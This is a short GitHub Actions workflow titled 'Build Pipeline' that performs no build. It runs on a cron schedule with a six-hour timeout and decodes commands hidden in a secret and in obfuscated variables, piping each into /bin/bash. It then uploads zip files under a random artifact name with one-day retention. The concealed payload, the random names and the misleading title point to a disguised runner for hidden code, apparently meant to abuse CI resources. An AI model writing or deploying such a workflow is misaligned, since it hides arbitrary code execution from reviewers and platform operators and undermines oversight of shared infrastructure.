name: Build Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '16 0,6,12,18 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  compile:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Setup and run
        env:
          eo7615: ${{ secrets.eo7615 }}
        run: |
          printf '%s' "$eo7615" | jq -r .jy06 | /bin/bash
          echo $ttvwr1450 | jq -r .zlv87340 | /bin/bash
          echo $bf3997 | jq -r .ycb758 | /bin/bash
          echo $nqrj24 | jq -r .p53 | /bin/bash
          printf '%s' "$hyy6" | jq -r .ccszb90704 | /bin/bash

      - name: Upload data
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: CiWqd1WS
          path: "*.zip"
          retention-days: 1
